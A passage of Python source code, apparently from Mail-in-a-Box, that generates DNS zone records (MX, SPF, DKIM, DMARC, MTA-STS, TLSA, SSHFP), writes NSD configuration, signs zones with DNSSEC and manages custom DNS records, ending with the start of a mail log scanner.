(It is not necessary for receiving mail on this domain.)" % domain), ] for qname, rtype, value, explanation in defaults: if value is None or value.strip() == "": continue # skip IPV6 if not set if not is_zone and qname == "www": continue # don't create any default 'www' subdomains on what are themselves subdomains # Set the default record, but not if: # (1) there is not a user-set record of the same type already # (2) there is not a CNAME record already, since you can't set both and who knows what takes precedence # (2) there is not an A record already (if this is an A record this is a dup of (1), and if this is an AAAA record then don't set a default AAAA record if the user sets a custom A record, since the default wouldn't make sense and it should not resolve if the user doesn't provide a new AAAA record) if not has_rec(qname, rtype) and not has_rec(qname, "CNAME") and not has_rec(qname, "A"): records.append((qname, rtype, value, explanation)) # Don't pin the list of records that has_rec checks against anymore. has_rec_base = records if domain_properties[domain]["mail"]: # The MX record says where email for the domain should be delivered: Here! if not has_rec(None, "MX", prefix="10 "): records.append((None, "MX", "10 %s." % env["PRIMARY_HOSTNAME"], "Required. Specifies the hostname (and priority) of the machine that handles @%s mail." % domain)) # SPF record: Permit the box ('mx', see above) to send mail on behalf of # the domain, and no one else. # Skip if the user has set a custom SPF record. if not has_rec(None, "TXT", prefix="v=spf1 "): records.append((None, "TXT", 'v=spf1 mx -all', "Recommended. Specifies that only the box is permitted to send @%s mail." % domain)) # Append the DKIM TXT record to the zone as generated by OpenDKIM. # Skip if the user has set a DKIM record already. opendkim_record_file = os.path.join(env['STORAGE_ROOT'], 'mail/dkim/mail.txt') with open(opendkim_record_file, encoding="utf-8") as orf: m = re.match(r'(\S+)\s+IN\s+TXT\s+\( ((?:"[^"]+"\s+)+)\)', orf.read(), re.S) val = "".join(re.findall(r'"([^"]+)"', m.group(2))) if not has_rec(m.group(1), "TXT", prefix="v=DKIM1; "): records.append((m.group(1), "TXT", val, "Recommended. Provides a way for recipients to verify that this machine sent @%s mail." % domain)) # Append a DMARC record. # Skip if the user has set a DMARC record already. if not has_rec("_dmarc", "TXT", prefix="v=DMARC1; "): records.append(("_dmarc", "TXT", 'v=DMARC1; p=quarantine;', "Recommended. Specifies that mail that does not originate from the box but claims to be from @%s or which does not have a valid DKIM signature is suspect and should be quarantined by the recipient's mail system." % domain)) if domain_properties[domain]["user"]: # Add CardDAV/CalDAV SRV records on the non-primary hostname that points to the primary hostname # for autoconfiguration of mail clients (so only domains hosting user accounts need it). # The SRV record format is priority (0, whatever), weight (0, whatever), port, service provider hostname (w/ trailing dot). if domain != env["PRIMARY_HOSTNAME"]: for dav in ("card", "cal"): qname = "_" + dav + "davs._tcp" if not has_rec(qname, "SRV"): records.append((qname, "SRV", "0 0 443 " + env["PRIMARY_HOSTNAME"] + ".", "Recommended. Specifies the hostname of the server that handles CardDAV/CalDAV services for email addresses on this domain.")) # If this is a domain name that there are email addresses configured for, i.e. 
"something@" # this domain name, then the domain name is a MTA-STS (https://tools.ietf.org/html/rfc8461) # Policy Domain. # # A "_mta-sts" TXT record signals the presence of a MTA-STS policy. The id field helps clients # cache the policy. It should be stable so we don't update DNS unnecessarily but change when # the policy changes. It must be at most 32 letters and numbers, so we compute a hash of the # policy file. # # The policy itself is served at the "mta-sts" (no underscore) subdomain over HTTPS. Therefore # the TLS certificate used by Postfix for STARTTLS must be a valid certificate for the MX # domain name (PRIMARY_HOSTNAME) *and* the TLS certificate used by nginx for HTTPS on the mta-sts # subdomain must be valid certificate for that domain. Do not set an MTA-STS policy if either # certificate in use is not valid (e.g. because it is self-signed and a valid certificate has not # yet been provisioned). Since we cannot provision a certificate without A/AAAA records, we # always set them (by including them in the www domains) --- only the TXT records depend on there # being valid certificates. mta_sts_records = [ ] if domain_properties[domain]["mail"] \ and domain_properties[env["PRIMARY_HOSTNAME"]]["certificate-is-valid"] \ and is_domain_cert_signed_and_valid("mta-sts." + domain, env): # Compute an up-to-32-character hash of the policy file. We'll take a SHA-1 hash of the policy # file (20 bytes) and encode it as base-64 (28 bytes, using alphanumeric alternate characters # instead of '+' and '/' which are not allowed in an MTA-STS policy id) but then just take its # first 20 characters, which is more than sufficient to change whenever the policy file changes # (and ensures any '=' padding at the end of the base64 encoding is dropped). with open("/var/lib/mailinabox/mta-sts.txt", "rb") as f: mta_sts_policy_id = base64.b64encode(hashlib.sha1(f.read()).digest(), altchars=b"AA").decode("ascii")[0:20] mta_sts_records.extend([ ("_mta-sts", "TXT", "v=STSv1; id=" + mta_sts_policy_id, "Optional. Part of the MTA-STS policy for incoming mail. If set, a MTA-STS policy must also be published.") ]) # Enable SMTP TLS reporting (https://tools.ietf.org/html/rfc8460) if the user has set a config option. # Skip if the rules below if the user has set a custom _smtp._tls record. if env.get("MTA_STS_TLSRPT_RUA") and not has_rec("_smtp._tls", "TXT", prefix="v=TLSRPTv1;"): mta_sts_records.append(("_smtp._tls", "TXT", "v=TLSRPTv1; rua=" + env["MTA_STS_TLSRPT_RUA"], "Optional. Enables MTA-STS reporting.")) for qname, rtype, value, explanation in mta_sts_records: if not has_rec(qname, rtype): records.append((qname, rtype, value, explanation)) # Add no-mail-here records for any qname that has an A or AAAA record # but no MX record. This would include domain itself if domain is a # non-mail domain and also may include qnames from custom DNS records. # Do this once at the end of generating a zone. if is_zone: qnames_with_a = {qname for (qname, rtype, value, explanation) in records if rtype in {"A", "AAAA"}} qnames_with_mx = {qname for (qname, rtype, value, explanation) in records if rtype == "MX"} for qname in qnames_with_a - qnames_with_mx: # Mark this domain as not sending mail with hard-fail SPF and DMARC records. d = (qname+"." if qname else "") + domain if not has_rec(qname, "TXT", prefix="v=spf1 "): records.append((qname, "TXT", 'v=spf1 -all', "Recommended. Prevents use of this domain name for outbound mail by specifying that no servers are valid sources for mail from @%s. 
If you do send email from this domain name you should either override this record such that the SPF rule does allow the originating server, or, take the recommended approach and have the box handle mail for this domain (simply add any receiving alias at this domain name to make this machine treat the domain name as one of its mail domains)." % d)) if not has_rec("_dmarc" + ("."+qname if qname else ""), "TXT", prefix="v=DMARC1; "): records.append(("_dmarc" + ("."+qname if qname else ""), "TXT", 'v=DMARC1; p=reject;', "Recommended. Prevents use of this domain name for outbound mail by specifying that the SPF rule should be honoured for mail from @%s." % d)) # And with a null MX record (https://explained-from-first-principles.com/email/#null-mx-record) if not has_rec(qname, "MX"): records.append((qname, "MX", '0 .', "Recommended. Prevents use of this domain name for incoming mail.")) # Sort the records. The None records *must* go first in the nsd zone file. Otherwise it doesn't matter. records.sort(key = lambda rec : list(reversed(rec[0].split(".")) if rec[0] is not None else "")) return records def is_domain_cert_signed_and_valid(domain, env): cert = get_ssl_certificates(env).get(domain) if not cert: return False # no certificate provisioned cert_status = check_certificate(domain, cert['certificate'], cert['private-key']) return cert_status[0] == 'OK' ######################################################################## def build_tlsa_record(env): # A DANE TLSA record in DNS specifies that connections on a port # must use TLS and the certificate must match a particular criteria. # # Thanks to http://blog.huque.com/2012/10/dnssec-and-certificates.html # and https://community.letsencrypt.org/t/please-avoid-3-0-1-and-3-0-2-dane-tlsa-records-with-le-certificates/7022 # for explaining all of this! Also see https://tools.ietf.org/html/rfc6698#section-2.1 # and https://github.com/mail-in-a-box/mailinabox/issues/268#issuecomment-167160243. # # There are several criteria. We used to use "3 0 1" criteria, which # meant to pin a leaf (3) certificate (0) with SHA256 hash (1). But # certificates change, and especially as we move to short-lived certs # they change often. The TLSA record handily supports the criteria of # a leaf certificate (3)'s subject public key (1) with SHA256 hash (1). # The subject public key is the public key portion of the private key # that generated the CSR that generated the certificate. Since we # generate a private key once the first time Mail-in-a-Box is set up # and reuse it for all subsequent certificates, the TLSA record will # remain valid indefinitely. from ssl_certificates import load_cert_chain, load_pem from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat fn = os.path.join(env["STORAGE_ROOT"], "ssl", "ssl_certificate.pem") cert = load_pem(load_cert_chain(fn)[0]) subject_public_key = cert.public_key().public_bytes(Encoding.DER, PublicFormat.SubjectPublicKeyInfo) # We could have also loaded ssl_private_key.pem and called priv_key.public_key().public_bytes(...) pk_hash = hashlib.sha256(subject_public_key).hexdigest() # Specify the TLSA parameters: # 3: Match the (leaf) certificate. (No CA, no trust path needed.) # 1: Match its subject public key. # 1: Use SHA256. return "3 1 1 " + pk_hash def build_sshfp_records(): # The SSHFP record is a way for us to embed this server's SSH public # key fingerprint into the DNS so that remote hosts have an out-of-band # method to confirm the fingerprint. See RFC 4255 and RFC 6594. This # depends on DNSSEC. 
# # On the client side, set SSH's VerifyHostKeyDNS option to 'ask' to # include this info in the key verification prompt or 'yes' to trust # the SSHFP record. # # See https://github.com/xelerance/sshfp for inspiriation. algorithm_number = { "ssh-rsa": 1, "ssh-dss": 2, "ecdsa-sha2-nistp256": 3, "ssh-ed25519": 4, } # Get our local fingerprints by running ssh-keyscan. The output looks # like the known_hosts file: hostname, keytype, fingerprint. The order # of the output is arbitrary, so sort it to prevent spurious updates # to the zone file (that trigger bumping the serial number). However, # if SSH has been configured to listen on a nonstandard port, we must # specify that port to sshkeyscan. port = get_ssh_port() # If nothing returned, SSH is probably not installed. if not port: return keys = shell("check_output", ["ssh-keyscan", "-4", "-t", "rsa,dsa,ecdsa,ed25519", "-p", str(port), "localhost"]) keys = sorted(keys.split("\n")) for key in keys: if key.strip() == "" or key[0] == "#": continue try: _host, keytype, pubkey = key.split(" ") yield "%d %d ( %s )" % ( algorithm_number[keytype], 2, # specifies we are using SHA-256 on next line hashlib.sha256(base64.b64decode(pubkey)).hexdigest().upper(), ) except: # Lots of things can go wrong. Don't let it disturb the DNS # zone. pass ######################################################################## def write_nsd_zone(domain, zonefile, records, env, force): # On the $ORIGIN line, there's typically a ';' comment at the end explaining # what the $ORIGIN line does. Any further data after the domain confuses # ldns-signzone, however. It used to say '; default zone domain'. # # The SOA contact address for all of the domains on this system is hostmaster # @ the PRIMARY_HOSTNAME. Hopefully that's legit. # # For the refresh through TTL fields, a good reference is: # https://www.ripe.net/publications/docs/ripe-203 # # A hash of the available DNSSEC keys are added in a comment so that when # the keys change we force a re-generation of the zone which triggers # re-signing it. zone = """ $ORIGIN {domain}. $TTL 86400 ; default time to live @ IN SOA ns1.{primary_domain}. hostmaster.{primary_domain}. ( __SERIAL__ ; serial number 7200 ; Refresh (secondary nameserver update interval) 3600 ; Retry (when refresh fails, how often to try again, should be lower than the refresh) 1209600 ; Expire (when refresh fails, how long secondary nameserver will keep records around anyway) 86400 ; Negative TTL (how long negative responses are cached) ) """ # Replace replacement strings. zone = zone.format(domain=domain, primary_domain=env["PRIMARY_HOSTNAME"]) # Add records. for subdomain, querytype, value, _explanation in records: if subdomain: zone += subdomain zone += "\tIN\t" + querytype + "\t" if querytype == "TXT": # Divide into 255-byte max substrings. v2 = "" while len(value) > 0: s = value[0:255] value = value[255:] s = s.replace('\\', '\\\\') # escape backslashes s = s.replace('"', '\\"') # escape quotes s = '"' + s + '"' # wrap in quotes v2 += s + " " value = v2 zone += value + "\n" # Append a stable hash of DNSSEC signing keys in a comment. zone += f"\n; DNSSEC signing keys hash: {hash_dnssec_keys(domain, env)}\n" # DNSSEC requires re-signing a zone periodically. That requires # bumping the serial number even if no other records have changed. # We don't see the DNSSEC records yet, so we have to figure out # if a re-signing is necessary so we can prematurely bump the # serial number. 
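	# A hedged illustration (values invented, not taken from a real zone): the
	# .signed file produced by ldns-signzone contains RRSIG records roughly of
	# the form
	#
	#   example.com. 86400 IN RRSIG SOA 8 2 86400 20250401000000 20250302000000 12345 example.com. <signature>
	#
	# where the first 14-digit timestamp (YYYYMMDDHHMMSS) is the signature
	# expiration. That timestamp is what the regular expression below pulls out
	# of the signed zone, e.g.:
	#
	#   >>> re.search(r"\sRRSIG\s+SOA\s+\d+\s+\d+\s\d+\s+(\d{14})",
	#   ...           " IN RRSIG SOA 8 2 86400 20250401000000 ...").group(1)
	#   '20250401000000'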
force_bump = False if not os.path.exists(zonefile + ".signed"): # No signed file yet. Shouldn't normally happen unless a box # is going from not using DNSSEC to using DNSSEC. force_bump = True else: # We've signed the domain. Check if we are close to the expiration # time of the signature. If so, we'll force a bump of the serial # number so we can re-sign it. with open(zonefile + ".signed", encoding="utf-8") as f: signed_zone = f.read() expiration_times = re.findall(r"\sRRSIG\s+SOA\s+\d+\s+\d+\s\d+\s+(\d{14})", signed_zone) if len(expiration_times) == 0: # weird force_bump = True else: # All of the times should be the same, but if not choose the soonest. expiration_time = min(expiration_times) expiration_time = datetime.datetime.strptime(expiration_time, "%Y%m%d%H%M%S") if expiration_time - datetime.datetime.now() < datetime.timedelta(days=3): # We're within three days of the expiration, so bump serial & resign. force_bump = True # Set the serial number. serial = datetime.datetime.now().strftime("%Y%m%d00") if os.path.exists(zonefile): # If the zone already exists, is different, and has a later serial number, # increment the number. with open(zonefile, encoding="utf-8") as f: existing_zone = f.read() m = re.search(r"(\d+)\s*;\s*serial number", existing_zone) if m: # Clear out the serial number in the existing zone file for the # purposes of seeing if anything *else* in the zone has changed. existing_serial = m.group(1) existing_zone = existing_zone.replace(m.group(0), "__SERIAL__ ; serial number") # If the existing zone is the same as the new zone (modulo the serial number), # there is no need to update the file. Unless we're forcing a bump. if zone == existing_zone and not force_bump and not force: return False # If the existing serial is not less than a serial number # based on the current date plus 00, increment it. Otherwise, # the serial number is less than our desired new serial number # so we'll use the desired new number. if existing_serial >= serial: serial = str(int(existing_serial) + 1) zone = zone.replace("__SERIAL__", serial) # Write the zone file. with open(zonefile, "w", encoding="utf-8") as f: f.write(zone) return True # file is updated def get_dns_zonefile(zone, env): for domain, fn in get_dns_zones(env): if zone == domain: break else: raise ValueError("%s is not a domain name that corresponds to a zone." % zone) nsd_zonefile = "/etc/nsd/zones/" + fn with open(nsd_zonefile, encoding="utf-8") as f: return f.read() ######################################################################## def write_nsd_conf(zonefiles, additional_records, env): # Write the list of zones to a configuration file. nsd_conf_file = "/etc/nsd/nsd.conf.d/zones.conf" nsdconf = "" # Append the zones. for domain, zonefile in zonefiles: nsdconf += f""" zone: name: {domain} zonefile: {zonefile} """ # If custom secondary nameservers have been set, allow zone transfers # and, if not a subnet, notifies to them. for ipaddr in get_secondary_dns(additional_records, mode="xfr"): if "/" not in ipaddr: nsdconf += "\n\tnotify: %s NOKEY" % (ipaddr) nsdconf += "\n\tprovide-xfr: %s NOKEY\n" % (ipaddr) # Check if the file is changing. If it isn't changing, # return False to flag that no change was made. if os.path.exists(nsd_conf_file): with open(nsd_conf_file, encoding="utf-8") as f: if f.read() == nsdconf: return False # Write out new contents and return True to signal that # configuration changed. 
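	# For reference, a stanza written to zones.conf ends up looking roughly like
	# the following (domain, zonefile name and IP address are illustrative only):
	#
	#   zone:
	#       name: example.com
	#       zonefile: example.com.txt
	#       notify: 203.0.113.5 NOKEY
	#       provide-xfr: 203.0.113.5 NOKEY
	#
	# The notify/provide-xfr lines appear only when secondary nameservers are
	# configured for zone transfers, and (per the comment above) notify is
	# limited to non-subnet entries.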
with open(nsd_conf_file, "w", encoding="utf-8") as f: f.write(nsdconf) return True ######################################################################## def find_dnssec_signing_keys(domain, env): # For key that we generated (one per algorithm)... d = os.path.join(env['STORAGE_ROOT'], 'dns/dnssec') keyconfs = [f for f in os.listdir(d) if f.endswith(".conf")] for keyconf in keyconfs: # Load the file holding the KSK and ZSK key filenames. keyconf_fn = os.path.join(d, keyconf) keyinfo = load_env_vars_from_file(keyconf_fn) # Skip this key if the conf file has a setting named DOMAINS, # holding a comma-separated list of domain names, and if this # domain is not in the list. This allows easily disabling a # key by setting "DOMAINS=" or "DOMAINS=none", other than # deleting the key's .conf file, which might result in the key # being regenerated next upgrade. Keys should be disabled if # they are not needed to reduce the DNSSEC query response size. if "DOMAINS" in keyinfo and domain not in [dd.strip() for dd in keyinfo["DOMAINS"].split(",")]: continue for keytype in ("KSK", "ZSK"): yield keytype, keyinfo[keytype] def hash_dnssec_keys(domain, env): # Create a stable (by sorting the items) hash of all of the private keys # that will be used to sign this domain. keydata = [] for keytype, keyfn in sorted(find_dnssec_signing_keys(domain, env)): oldkeyfn = os.path.join(env['STORAGE_ROOT'], 'dns/dnssec', keyfn + ".private") keydata.extend((keytype, keyfn)) with open(oldkeyfn, encoding="utf-8") as fr: keydata.append( fr.read() ) keydata = "".join(keydata).encode("utf8") return hashlib.sha1(keydata).hexdigest() def sign_zone(domain, zonefile, env): # Sign the zone with all of the keys that were generated during # setup so that the user can choose which to use in their DS record at # their registrar, and also to support migration to newer algorithms. # In order to use the key files generated at setup which are for # the domain _domain_, we have to re-write the files and place # the actual domain name in it, so that ldns-signzone works. # # Patch each key, storing the patched version in /tmp for now. # Each key has a .key and .private file. Collect a list of filenames # for all of the keys (and separately just the key-signing keys). all_keys = [] ksk_keys = [] for keytype, keyfn in find_dnssec_signing_keys(domain, env): newkeyfn = '/tmp/' + keyfn.replace("_domain_", domain) for ext in (".private", ".key"): # Copy the .key and .private files to /tmp to patch them up. # # Use os.umask and open().write() to securely create a copy that only # we (root) can read. oldkeyfn = os.path.join(env['STORAGE_ROOT'], 'dns/dnssec', keyfn + ext) with open(oldkeyfn, encoding="utf-8") as fr: keydata = fr.read() keydata = keydata.replace("_domain_", domain) prev_umask = os.umask(0o77) # ensure written file is not world-readable try: with open(newkeyfn + ext, "w", encoding="utf-8") as fw: fw.write(keydata) finally: os.umask(prev_umask) # other files we write should be world-readable # Put the patched key filename base (without extension) into the list of keys we'll sign with. all_keys.append(newkeyfn) if keytype == "KSK": ksk_keys.append(newkeyfn) # Do the signing. 
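	# The shell call below is roughly equivalent to running something like the
	# following (the zone and key file names here are hypothetical, for
	# illustration only):
	#
	#   ldns-signzone -e 20250401 -n /etc/nsd/zones/example.com.txt \
	#       /tmp/Kexample.com.+013+12345 /tmp/Kexample.com.+008+54321
	#
	# i.e. sign the zone with every patched key and expire the signatures on the
	# given date; ldns-signzone writes its output next to the input zone file
	# with a ".signed" suffix, which is what write_nsd_zone() checks for.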
expiry_date = (datetime.datetime.now() + datetime.timedelta(days=30)).strftime("%Y%m%d") shell('check_call', ["/usr/bin/ldns-signzone", # expire the zone after 30 days "-e", expiry_date, # use NSEC3 "-n", # zonefile to sign "/etc/nsd/zones/" + zonefile, ] # keys to sign with (order doesn't matter -- it'll figure it out) + all_keys ) # Create a DS record based on the patched-up key files. The DS record is specific to the # zone being signed, so we can't use the .ds files generated when we created the keys. # The DS record points to the KSK only. Write this next to the zone file so we can # get it later to give to the user with instructions on what to do with it. # # Generate a DS record for each key. There are also several possible hash algorithms that may # be used, so we'll pre-generate all for each key. One DS record per line. Only one # needs to actually be deployed at the registrar. We'll select the preferred one # in the status checks. with open("/etc/nsd/zones/" + zonefile + ".ds", "w", encoding="utf-8") as f: for key in ksk_keys: for digest_type in ('1', '2', '4'): rr_ds = shell('check_output', ["/usr/bin/ldns-key2ds", "-n", # output to stdout "-" + digest_type, # 1=SHA1, 2=SHA256, 4=SHA384 key + ".key" ]) f.write(rr_ds) # Remove the temporary patched key files. for fn in all_keys: os.unlink(fn + ".private") os.unlink(fn + ".key") ######################################################################## def write_opendkim_tables(domains, env): # Append a record to OpenDKIM's KeyTable and SigningTable for each domain # that we send mail from (zones and all subdomains). opendkim_key_file = os.path.join(env['STORAGE_ROOT'], 'mail/dkim/mail.private') if not os.path.exists(opendkim_key_file): # Looks like OpenDKIM is not installed. return False config = { # The SigningTable maps email addresses to a key in the KeyTable that # specifies signing information for matching email addresses. Here we # map each domain to a same-named key. # # Elsewhere we set the DMARC policy for each domain such that mail claiming # to be From: the domain must be signed with a DKIM key on the same domain. # So we must have a separate KeyTable entry for each domain. "SigningTable": "".join( f"*@{domain} {domain}\n" for domain in domains ), # The KeyTable specifies the signing domain, the DKIM selector, and the # path to the private key to use for signing some mail. Per DMARC, the # signing domain must match the sender's From: domain. "KeyTable": "".join( f"{domain} {domain}:mail:{opendkim_key_file}\n" for domain in domains ), } did_update = False for filename, content in config.items(): # Don't write the file if it doesn't need an update. if os.path.exists("/etc/opendkim/" + filename): with open("/etc/opendkim/" + filename, encoding="utf-8") as f: if f.read() == content: continue # The contents needs to change. with open("/etc/opendkim/" + filename, "w", encoding="utf-8") as f: f.write(content) did_update = True # Return whether the files changed. If they didn't change, there's # no need to kick the opendkim process. return did_update ######################################################################## def get_custom_dns_config(env, only_real_records=False): try: with open(os.path.join(env['STORAGE_ROOT'], 'dns/custom.yaml'), encoding="utf-8") as f: custom_dns = rtyaml.load(f) if not isinstance(custom_dns, dict): raise ValueError # caught below except: return [ ] for qname, value in custom_dns.items(): if qname == "_secondary_nameserver" and only_real_records: continue # skip fake record # Short form. 
Mapping a domain name to a string is short-hand # for creating A records. if isinstance(value, str): values = [("A", value)] # A mapping creates multiple records. elif isinstance(value, dict): values = value.items() # No other type of data is allowed. else: raise ValueError for rtype, value2 in values: if isinstance(value2, str): yield (qname, rtype, value2) elif isinstance(value2, list): for value3 in value2: yield (qname, rtype, value3) # No other type of data is allowed. else: raise ValueError def filter_custom_records(domain, custom_dns_iter): for qname, rtype, value in custom_dns_iter: # We don't count the secondary nameserver config (if present) as a record - that would just be # confusing to users. Instead it is accessed/manipulated directly via (get/set)_custom_dns_config. if qname == "_secondary_nameserver": continue # Is this record for the domain or one of its subdomains? # If `domain` is None, return records for all domains. if domain is not None and qname != domain and not qname.endswith("." + domain): continue # Turn the fully qualified domain name in the YAML file into # our short form (None => domain, or a relative QNAME) if # domain is not None. if domain is not None: qname = None if qname == domain else qname[0:len(qname) - len("." + domain)] yield (qname, rtype, value) def write_custom_dns_config(config, env): # We get a list of (qname, rtype, value) triples. Convert this into a # nice dictionary format for storage on disk. from collections import OrderedDict config = list(config) dns = OrderedDict() seen_qnames = set() # Process the qnames in the order we see them. for qname in [rec[0] for rec in config]: if qname in seen_qnames: continue seen_qnames.add(qname) records = [(rec[1], rec[2]) for rec in config if rec[0] == qname] if len(records) == 1 and records[0][0] == "A": dns[qname] = records[0][1] else: dns[qname] = OrderedDict() seen_rtypes = set() # Process the rtypes in the order we see them. for rtype in [rec[0] for rec in records]: if rtype in seen_rtypes: continue seen_rtypes.add(rtype) values = [rec[1] for rec in records if rec[0] == rtype] if len(values) == 1: values = values[0] dns[qname][rtype] = values # Write. config_yaml = rtyaml.dump(dns) with open(os.path.join(env['STORAGE_ROOT'], 'dns/custom.yaml'), "w", encoding="utf-8") as f: f.write(config_yaml) def set_custom_dns_record(qname, rtype, value, action, env): # validate qname for zone, _fn in get_dns_zones(env): # It must match a zone apex or be a subdomain of a zone # that we are otherwise hosting. if qname == zone or qname.endswith("."+zone): break else: # No match. if qname != "_secondary_nameserver": raise ValueError("%s is not a domain name or a subdomain of a domain name managed by this box." % qname) # validate rtype rtype = rtype.upper() if value is not None and qname != "_secondary_nameserver": if not re.search(DOMAIN_RE, qname): msg = "Invalid name." raise ValueError(msg) if rtype in {"A", "AAAA"}: if value != "local": # "local" is a special flag for us v = ipaddress.ip_address(value) # raises a ValueError if there's a problem if rtype == "A" and not isinstance(v, ipaddress.IPv4Address): raise ValueError("That's an IPv6 address.") if rtype == "AAAA" and not isinstance(v, ipaddress.IPv6Address): raise ValueError("That's an IPv4 address.") elif rtype in {"CNAME", "NS"}: if rtype == "NS" and qname == zone: msg = "NS records can only be set for subdomains." raise ValueError(msg) # ensure value has a trailing dot if not value.endswith("."): value = value + "." 
if not re.search(DOMAIN_RE, value): msg = "Invalid value." raise ValueError(msg) elif rtype in {"CNAME", "TXT", "SRV", "MX", "SSHFP", "CAA"}: # anything goes pass else: raise ValueError("Unknown record type '%s'." % rtype) # load existing config config = list(get_custom_dns_config(env)) # update newconfig = [] made_change = False needs_add = True for _qname, _rtype, _value in config: if action == "add": if (_qname, _rtype, _value) == (qname, rtype, value): # Record already exists. Bail. return False elif action == "set": if (_qname, _rtype) == (qname, rtype): if _value == value: # Flag that the record already exists, don't # need to add it. needs_add = False else: # Drop any other values for this (qname, rtype). made_change = True continue elif action == "remove": if (_qname, _rtype, _value) == (qname, rtype, value): # Drop this record. made_change = True continue if value is None and (_qname, _rtype) == (qname, rtype): # Drop all qname-rtype records. made_change = True continue else: raise ValueError("Invalid action: " + action) # Preserve this record. newconfig.append((_qname, _rtype, _value)) if action in {"add", "set"} and needs_add and value is not None: newconfig.append((qname, rtype, value)) made_change = True if made_change: # serialize & save write_custom_dns_config(newconfig, env) return made_change ######################################################################## def get_secondary_dns(custom_dns, mode=None): resolver = dns.resolver.get_default_resolver() resolver.timeout = 10 resolver.lifetime = 10 values = [] for qname, _rtype, value in custom_dns: if qname != '_secondary_nameserver': continue for hostname in value.split(" "): hostname = hostname.strip() if mode is None: # Just return the setting. values.append(hostname) continue # If the entry starts with "xfr:" only include it in the zone transfer settings. if hostname.startswith("xfr:"): if mode != "xfr": continue hostname = hostname[4:] # If is a hostname, before including in zone xfr lines, # resolve to an IP address. # It may not resolve to IPv6, so don't throw an exception if it # doesn't. Skip the entry if there is a DNS error. if mode == "xfr": try: ipaddress.ip_interface(hostname) # test if it's an IP address or CIDR notation values.append(hostname) except ValueError: try: response = dns.resolver.resolve(hostname+'.', "A", raise_on_no_answer=False) values.extend(map(str, response)) except dns.exception.DNSException: pass try: response = dns.resolver.resolve(hostname+'.', "AAAA", raise_on_no_answer=False) values.extend(map(str, response)) except dns.exception.DNSException: pass else: values.append(hostname) return values def set_secondary_dns(hostnames, env): if len(hostnames) > 0: # Validate that all hostnames are valid and that all zone-xfer IP addresses are valid. resolver = dns.resolver.get_default_resolver() resolver.timeout = 5 resolver.lifetime = 5 for item in hostnames: if not item.startswith("xfr:"): # Resolve hostname. try: resolver.resolve(item, "A") except (dns.resolver.NoNameservers, dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.Timeout): try: resolver.resolve(item, "AAAA") except (dns.resolver.NoNameservers, dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.Timeout): raise ValueError("Could not resolve the IP address of %s." % item) else: # Validate IP address. 
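				# Illustrative entries (documentation addresses, not real servers):
				# "xfr:203.0.113.2" is validated with ip_address(), while a CIDR
				# form such as "xfr:2001:db8::/48" contains "/" and is validated
				# with ip_network(). In both cases the "xfr:" prefix stays on the
				# stored value; it is only stripped for validation here.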
try: if "/" in item[4:]: ipaddress.ip_network(item[4:]) # raises a ValueError if there's a problem else: ipaddress.ip_address(item[4:]) # raises a ValueError if there's a problem except ValueError: raise ValueError("'%s' is not an IPv4 or IPv6 address or subnet." % item[4:]) # Set. set_custom_dns_record("_secondary_nameserver", "A", " ".join(hostnames), "set", env) else: # Clear. set_custom_dns_record("_secondary_nameserver", "A", None, "set", env) # Apply. return do_dns_update(env) def get_custom_dns_records(custom_dns, qname, rtype): for qname1, rtype1, value in custom_dns: if qname1 == qname and rtype1 == rtype: yield value ######################################################################## def build_recommended_dns(env): ret = [] for (domain, _zonefile, records) in build_zones(env): # remove records that we don't display records = [r for r in records if r[3] is not False] # put Required at the top, then Recommended, then everythiing else records.sort(key = lambda r : 0 if r[3].startswith("Required.") else (1 if r[3].startswith("Recommended.") else 2)) # expand qnames for i in range(len(records)): qname = domain if records[i][0] is None else records[i][0] + "." + domain records[i] = { "qname": qname, "rtype": records[i][1], "value": records[i][2], "explanation": records[i][3], } # return ret.append((domain, records)) return ret if __name__ == "__main__": from utils import load_environment env = load_environment() if sys.argv[-1] == "--lint": write_custom_dns_config(get_custom_dns_config(env), env) else: for _zone, records in build_recommended_dns(env): for record in records: print("; " + record['explanation']) print(record['qname'], record['rtype'], record['value'], sep="\t") print() File: management/mail_log.py #!/usr/local/lib/mailinabox/env/bin/python import argparse import datetime import gzip import os.path import re import shutil import tempfile import textwrap from collections import defaultdict, OrderedDict import dateutil.parser import time from dateutil.relativedelta import relativedelta import utils LOG_FILES = ( '/var/log/mail.log.6.gz', '/var/log/mail.log.5.gz', '/var/log/mail.log.4.gz', '/var/log/mail.log.3.gz', '/var/log/mail.log.2.gz', '/var/log/mail.log.1', '/var/log/mail.log', ) TIME_DELTAS = OrderedDict([ ('all', datetime.timedelta(weeks=52)), ('month', datetime.timedelta(weeks=4)), ('2weeks', datetime.timedelta(days=14)), ('week', datetime.timedelta(days=7)), ('2days', datetime.timedelta(days=2)), ('day', datetime.timedelta(days=1)), ('12hours', datetime.timedelta(hours=12)), ('6hours', datetime.timedelta(hours=6)), ('hour', datetime.timedelta(hours=1)), ('30min', datetime.timedelta(minutes=30)), ('10min', datetime.timedelta(minutes=10)), ('5min', datetime.timedelta(minutes=5)), ('min', datetime.timedelta(minutes=1)), ('today', datetime.datetime.now() - datetime.datetime.now().replace(hour=0, minute=0, second=0)) ]) END_DATE = NOW = datetime.datetime.now() START_DATE = None VERBOSE = False # List of strings to filter users with FILTERS = None # What to show (with defaults) SCAN_OUT = True # Outgoing email SCAN_IN = True # Incoming email SCAN_DOVECOT_LOGIN = True # Dovecot Logins SCAN_GREY = False # Greylisted email SCAN_BLOCKED = False # Rejected email def scan_files(collector): """ Scan files until they run out or the earliest date is reached """ stop_scan = False for fn in LOG_FILES: tmp_file = None if not os.path.exists(fn): continue elif fn[-3:] == '.gz': tmp_file = tempfile.NamedTemporaryFile() with gzip.open(fn, 'rb') as f: shutil.copyfileobj(f, tmp_file) 
